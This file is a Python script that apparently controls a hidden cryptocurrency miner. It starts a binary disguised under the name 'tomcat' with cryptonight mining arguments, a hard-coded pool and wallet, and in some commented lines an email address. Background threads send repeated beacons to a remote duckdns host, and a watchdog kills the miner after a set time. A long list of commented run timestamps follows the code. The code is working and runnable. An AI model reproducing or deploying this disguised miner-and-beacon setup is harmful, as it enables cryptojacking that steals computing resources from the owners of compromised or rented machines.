import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:52:03.462893
#2018-02-17 17:39:01.406372
#2018-02-17 19:27:07.543063
#2018-02-17 21:16:07.440000
#2018-02-17 23:00:06.383741
#2018-02-18 00:46:04.321796
#2018-02-18 02:35:03.740035
#2018-02-18 04:22:01.625249
#2018-02-18 06:12:07.427149
#2018-02-18 08:03:04.310565
#2018-02-18 09:50:08.127737
#2018-02-18 11:38:06.521984
#2018-02-18 13:23:06.802544
#2018-02-18 15:14:05.947635
#2018-02-18 17:03:05.927232
#2018-02-18 18:50:07.783048
#2018-02-18 20:37:04.918222
#2018-02-18 22:23:07.319735
#2018-02-19 00:12:06.941745
#2018-02-19 01:59:06.184633
#2018-02-19 03:46:05.839585
#2018-02-19 05:30:03.903035
#2018-02-19 07:18:06.678665
#2018-02-19 09:07:05.924002
#2018-02-19 10:56:05.962781
#2018-02-19 12:45:08.627512
#2018-02-19 14:34:08.217916
#2018-02-19 16:22:01.859445
#2018-02-19 18:09:02.209951
#2018-02-19 19:57:06.264425
#2018-02-19 21:47:04.294531
#2018-02-19 23:32:07.755143
#2018-02-20 01:19:07.302252
#2018-02-20 03:08:07.533557
#2018-02-20 04:55:04.859936
#2018-02-20 06:38:03.822596
#2018-02-20 08:23:06.618312
#2018-02-20 10:09:04.649387
#2018-02-20 11:54:06.519347
#2018-02-20 13:43:08.934493
#2018-02-20 15:28:08.584720
#2018-02-20 17:13:09.951169
#2018-02-20 19:03:04.291266
#2018-02-20 20:51:02.199377
#2018-02-20 22:35:07.731112
#2018-02-21 00:18:08.862694
#2018-02-21 02:04:05.023604
#2018-02-21 03:53:04.682603
#2018-02-21 05:41:04.660811
#2018-02-21 07:32:02.051043
#2018-02-21 09:17:03.964832
#2018-02-21 11:05:01.263551
#2018-02-21 12:53:10.662788
#2018-02-21 14:41:10.085513
#2018-02-21 16:27:05.939931
#2018-02-21 18:19:08.395194
#2018-02-21 20:06:01.710756
#2018-02-21 21:54:06.959942
#2018-02-21 23:39:06.931251
#2018-02-22 01:28:07.037900
#2018-02-22 03:16:07.710341
#2018-02-22 05:02:05.655088
#2018-02-22 06:45:08.209230
#2018-02-22 08:35:01.990413
#2018-02-22 10:22:06.499091
#2018-02-22 12:09:07.746966
#2018-02-22 13:55:07.294521
#2018-02-22 15:43:10.772862
#2018-02-22 17:32:12.959356
#2018-02-22 19:20:08.966351
#2018-02-22 21:11:02.088397
#2018-02-22 22:55:07.157148
#2018-02-23 00:42:01.255255
#2018-02-23 02:28:04.308672
#2018-02-23 04:18:05.041520
#2018-02-23 06:04:06.498877
#2018-02-23 07:51:04.374371
#2018-02-23 10:08:08.247048
#2018-02-23 12:04:08.147791
#2018-02-23 13:53:04.470387
#2018-02-23 15:45:03.613560
#2018-02-23 17:31:01.728179
#2018-02-23 19:19:04.082269
#2018-02-23 21:02:08.283923
#2018-02-23 22:46:01.768100
#2018-02-24 00:30:08.403804
#2018-02-24 02:21:01.951782
#2018-02-24 04:10:07.686730
#2018-02-24 05:58:06.879006
#2018-02-24 07:45:08.185753
#2018-02-24 09:29:06.876411
#2018-02-24 11:23:04.581327
#2018-02-24 13:12:07.377580
#2018-02-24 15:02:01.260272
#2018-02-24 16:51:07.454527
#2018-02-24 18:41:04.241606
#2018-02-24 20:32:07.437958
#2018-02-24 22:32:04.433336
#2018-02-25 02:52:06.251957
#2018-02-25 06:31:04.968944